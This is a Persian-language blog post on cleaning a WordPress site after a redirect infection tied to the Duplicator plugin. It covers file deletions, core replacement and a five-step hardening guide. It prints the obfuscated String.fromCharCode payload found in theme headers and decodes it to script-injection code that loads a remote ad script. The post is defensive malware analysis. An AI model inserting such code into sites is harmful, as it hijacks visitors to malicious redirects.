ویروس ریدایرکت وردپرس

ویروس ریدایرکت وردپرس حل مشکل ریدایرکت شدن سایت های وردپرسی

سلام.اخیرا یک سری از سایت های وردپرسی که از پلاگین duplicator استفاده میکردن به مشکلی خوردن

که در صورت وارد کردن آدرس سایت، به صورت اتوماتیک redirect میشه به یک سری سایت های

تبلیغاتی که چند روزی خودم درگیر حل این مسئله بودم و پس از تست کردن راه های مختلف و نتیجه

نگرفتن ، تصمیم گرفتم این مطلب رو بنوسیم تا کمکی کرده باشم به دوستانی که این مشکل رو دارن.

(اختصاصی مهندس حامی امامی)

حل و رفع مشکل ریدایرکت در وردپرس | ویروس جدید وردپرس
حل و رفع مشکل ریدایرکت در وردپرس | ویروس جدید وردپرس

برای حل این مسئله پلاگین های امنیتی مختلفی که در این زمینه بود رو تست کردم ولی متاسفانه نتیجه ای

که میخواستم رو نداشت و در نهایت محبور شدم خودم کدهای سایت رو بررسی کردم و توی این بررسی

کردن ها به نکات بسیار جالبی رسیدم که در ادامه میگم بهتون.

اول از همه، وارد هاست سایت بشین و این فایل هارو که مربوط به ویروس میشه رو حذف کنین:

temp-crawl.php
wp-crawl.php

البته یک نگاهی هم به فولدر wp-content بندازین چون توی مواردی این فایل ها اونجا هم بوده و اگر بود ، حذف کنین.

و در نهایت فایل های زیر رو هم حذف کنین، که مربوط میشه به فایل های نصبی پلاگین داپلیکیتور :

database.sql
installer.php
installer-backup.php 
installer-log.txt 
installer-data.sql 

بعد از اینکه فایل های بالا رو حذف کردین فایل wp-config رو از یک وردپرس سالم بردارین و جایگزین فایل فعلی کنین و در نهایت هم اطلاعات دیتایس رو داخلش وارد کنین.

همچنین باید هسته jquery وردپرس رو هم آپدیت کنین که برای این کار پس از دانلود کردن وردپرس،

به این مسیر برین “wp-includes/js/jquery/jquery.js ” و فایل jquery.js رو جایگزین فایل فعلی کنین.


خب بعد از اینکه مراحل بالا رو طی کردین میرسیم به مرحله آخر که باید کدهایی که مربوط به این ویروس میشه رو از داخل قالب سایت حذف کنیم.

معمولا این دسته از ویروس ها یک سری کدهایی رو داخل قالب سایت و یا قسمت های دیگه مثل کدهای پلاگین ها و … قرار میدن که بتون به راحتی به اون هدفی که دنبال میکنن برسن.

ویروس ریدایرکت وردپرس

که این ویروس هم دقیقا به همین شکل بود ، توی زمانی که داشتم کدهای سایت رو بررسی میکردم ،

یک سری کدهای جاوا اسکریپت رو توی هدر سایت دیدم که بعد از مقایسه با سایت هایی که این مشکل

رو نداشتن متوجه شدم که این کدها به قالب اضافه شدن 😐

کد زیر یک نمونه از کدهایی هستش که این دسته از ویروس ها داخل قالب سایت قرار میدن.

1String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125);

برای حذف این کد به مسیر “wp-content\themes ” برین و قالبی که در حال حاضر روی سایت نصب

شده رو انتخاب کنین، از داخل فایل های قالب فایل header.php رو انتخاب کنین و کدهایی مشابه با کد

بالا رو از داخلش به طور کامل حذف کنین البته اگر از قالب های دیگه ای هم استفاده میکنین باید این کد

رو از فایل header.php اون قالب ها هم پاک کنین.

اگر افزونه های Contextual Related Posts و Related Posts نصب و فعال دارید را حتما غیر فعال نمایید.

بعد از انجام این کار عملا مشکل به طور کامل حل میشه ولی اگر دقیقا میخواین بدونین که این کدها چه کار میکنن با من همراه باشین تا بررسی کنیم.

در واقع این ویروس اومده از متد ()String.fromCharCode استفاده کرده که در واقع این

متد کاری که انجام میده، کدهای utf-16 رو تبدیل میکنه به string .

برای مثال خروجی کد زیر میشه: “ABC”

1String.fromCharCode(65, 66, 67);    
1// returns "ABC

در واقع اون کد اولی که قرار دادم، در صورت اجرا شدن خروجی زیر رو بهمون میده :

1 var elem = document.createElement(‘script’); elem.type = ‘text/javascript’; elem.async = true;elem.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 97, 100, 115, 46, 118, 111, 105, 112, 110, 101, 119, 115, 119, 105, 114, 101, 46, 110, 101, 116, 47, 97, 100, 46, 106, 115);   var alls = document.getElementsByTagName(‘script’); var nt3 = true; for ( var i = alls.length; i–;) { if (alls[i].src.indexOf(String.fromCharCode(118, 111, 105, 112, 110, 101, 119, 115, 119, 105, 114, 101)) > -1) { nt3 = false;} } if(nt3 == true){document.getElementsByTagName(\”head\”)[0].appendChild(elem); }

کد ویروس ریدایرکت وردپرس

این کد کاری که انجام میده میاد یک تگ اسکریپت میسازه که برای src اسکریپت مجدد از String.fromCharCode استفاده کرده که زمانی که خروجی اون رو میگیریم میشه این آدرس : 
https://ads.voipnewswire.net/ad.js 
که در نهایت با اجرا شدن کدهای جاوا اسکریپت که داخل آدرس بالا هست ، مجدد یک آدرس دیگه رو

باز میکنه و این مراحل چندین مرتبه تکرار میشه 🙂
تا اینکه در نهایت اتفاقی که رخ میده url سایت های تبلیغاتی رو معمولا هر چند روز یک بار هم تغییر میکنن رو داخل یک صفحه قرار میدن و دیگه ادامه ماجرا …

از طریق این لینک میتونین تک تک مراحلی که طی میشه تا به اون سایت تبلیغاتی میرسه رو ببینین.

مشکل ریدایرکت در وردپرس | ویروس جدید وردپرس

حل و رفع مشکل ریدایرکت در وردپرس | ویروس جدید وردپرس
حل و رفع مشکل ریدایرکت در وردپرس | ویروس جدید وردپرس

 باگ امنیتی در وردپرس مشکل ریدایرکت وردپرس | ویروس جدید وردپرس این آموزش تقریبا برای

رفع مشکل انواع مدلهای هک شدن سایت وردپرسی کارایی دارد و اختصاصا مرتبط به ریدایرکت

نمی باشد. با این پنچ قدم مشکل هک شدن وردپرس و ریدایرکت سایت وردپرسی خود را حل کنید.

 باگ امنیتی در وردپرس

مشکل ریدایرکت وردپرس | ویروس جدید وردپرس

این آموزش تقریبا برای رفع مشکل انواع مدلهای هک شدن سایت وردپرسی کارایی دارد و اختصاصا مرتبط به ریدایرکت نمی باشد.

با این پنچ قدم مشکل هک شدن وردپرس و ریدایرکت سایت وردپرسی خود را حل کنید.

این مقاله اختصاصی تیم طراحی سایت سئوپیچ می باشد، لطفا با ذکر منبع از آن استفاده کنید

متاسفانه جدیدا گزارش هایی مبنی بر هک شدن سایت های وردپرسی داشتیم و با بررسی هایی که صورت گرفته در این وب سایت ها افزونه Duplicator نصب و فعال بوده است که این افزونه باگ امنیتی خطرناکی را برای وب سایت ایجاد میکند.

افزونه Duplicator چیست و چگونه باعث هک شدن وب سایت ها می شود؟

افزونه Duplicator امکان ساخت بسته آسان نصب وردپرس را برای کاربران فراهم میکند. توسط این

افزونه می توان از یک وب سایت به صورت کامل کپی تهیه کرد و بر روی هاست دیگر آن را نصب

و راه اندازی کرد تا یک وب سایت دیگر با همان ظاهر و محتوای وب سایت قبلی داشته باشید.

متاسفانه این افزونه روی بسیاری از وب سایت های وردپرسی نصب می باشد و با توجه به اینکه

راه اندازی سایت توسط این افزونه بسیار ساده است محبوبت بسیار بالایی داشته و هم اکنون بیش

از یک میلیون نصب فعال دارد.

این افزونه فایل های  installer.php، installer-backup.php، installer-data.sql و پوشه wp-snapshot

را در کنار فایل های وردپرس شما قرار میدهد و با توجه به باگی که این افزونه دارد هکر می تواند دوباره

اقدام به نصب ودپرس کند و با آپلود شل یا فایل های مخرب به فایل های کانفیگ وردپرس دسترسی پیدا

کرده و آن را دستکاری کرده و سایت را از دسترس خارج کند.

اما مسئله فقط به اینجا ختم نمی شود و معمولا هکر ها با قرار دادن کد هایی داخل فایل های وردپرس

بازدید کننده وب سایت شما را به وب سایت های خود هدایت میکنند. که این امر خسارت زیادی به

وب سایت ها وارد میکند.

چطور این باگ امنیتی را برطرف کنیم؟

قدم اول:  وارد پیشخوان وردپرس خودتان بشوید و هسته وردپرس و افزونه هایی موجود را به آخرین نسخه به روز رسانی کنید توجه داشته باشید که اگر نیاز به به روز رسانی داشته باشند در مسیر پیشخوان و بعد به روز رسانی اخطار داده می شود.

قدم دوم: افزونه Duplicator را از قسمت افزونه ها حذف کنید و در مسیر فایل های افزونه در وردپرس مطمئن شوید که فایل های آن حذف شده است و همچنین فایل های installer.php، installer-backup.php، installer-data.sql و پوشه wp-snapshot را در صورت وجود جذف کنید.

قدم سوم: پاک سازی ویروس و تروجان از سایت

برای اینکار ابتدا تمام افزونه ها و قالب ها را از داخل هاست پاک کنید ، (توجه کنید : نسخه بکاپ داشته باشید.) ،

قدم چهارم: وردپرس را بصورت دستی اپدیت کنید .

1- فایل htaccess را ویرایش کرده و کدهای اورجینال وردپرس را بجای کدهای داخل آن قرار دهید،معمولا بعد از تغییر در این فایل توسط ویروس ها یک فایل با همین نام و پسوند اورجینال در کنار ان ایجاد می شود.

2- فایل wp-config.php را باز کنید ، در سه خط اول باید کد زیر قرار داشته باشد

<?php
/**
* The base configuration for WordPress

در غیر این صورت هر کدی بود پاک کنید

3- آخرین نسخه وردپرس رو از سایت مرجع دریافت کنید و سپس آن را از حالت فشرده خارج کنید

غیر از فایل های wp-config.php و .htaccess و پوشه wp-content تمامی فایل ها و پوشه های وردپرس نسخه جدید را بر روی هاست آپلود کنید تا جایگزین فایل های ورژن قدیمی شود ، قبل از آپلود فایلهای جدید ، فایلهای و پوشه های قبلی را بصورت کامل دلیت کنید

انجام بروزرسانی

آدرس زیر رو باز کنید و جای bazar19.ir نام دامنه خود را وارد کنید

http://bazar19.ir /wp-admin/upgrade.php

سپس آپدیت رو در این صفحه انجام بدید و مجدد افزونه های سایت را از مخزن وردپرس یا منبع معتبر دریافت و فعال کنید

آپدیت انجام شد

قدم پبجم: اسکن فایل های الوده

برای اینکار دو افزونه

Anti-Malware Security and Brute-Force Firewall

و

Quttera Web Malware Scanner for WordPress

را از مخزن وردپرس دانلود و نصب نمایید ، وردپرس خود را اسکن کنید. احتمالا حجم بالایی از فایلهای آلوده مواجه خواهید شد. فایل آلوده مربوط به پوشه wp-content را از داخل هاست حذف کنید.

و در نهایت حتما قبل از بارگزاری قالب و افزونه هایی که از مخزن وردپرس دانلود نشده اند، حتما فایل زیپ قالب یا افزونه را در سایت virustotal.com اسکن نمایید، در صورتیکه فایل شما الوده نباشد ، نتایج حاصل سبز رنگ می باشند و نتایج قرمز نشان دهنده آلوده بودن فایل شما می باشد.

وب سایت من با این روش هک شده است چطور برگردانم؟

اگر وب سایت شما توسط این باگ هک شده است بهتر است برای بخش پشتیبانی سرویس دهنده هاست خود تیکت ارسال کنید و درخواست بازگردانی بک اپ کنید و بعد از بازگردانی 5 قدم بالا را انجام بدهید.

اما اگر با بازگردانی بک آپ مشکل وب سایت شما برطرف نشده است باید فایل wp-config.php را ویرایش کرده و اطلاعات دیتابیس را مجدد در آن وارد کنید و اگر کدهایی غیر از کد های پیشفرض وردپرس را مشاهده کردید آن را حذف کرده و فایل های installer.php، installer-backup.php، installer-data.sql و پوشه wp-snapshot  در صورت وجود در هاست نیز حذف شود.

در صورتیکه مشکل شما متفاوت می باشد ، یا نیازمند تامین امنیت سایت خود می باشید ، با ما در ارتباط باشید.

تلفن تماس : 09359898808

امیدوارم مطلب مفیدی بوده باشه براتون.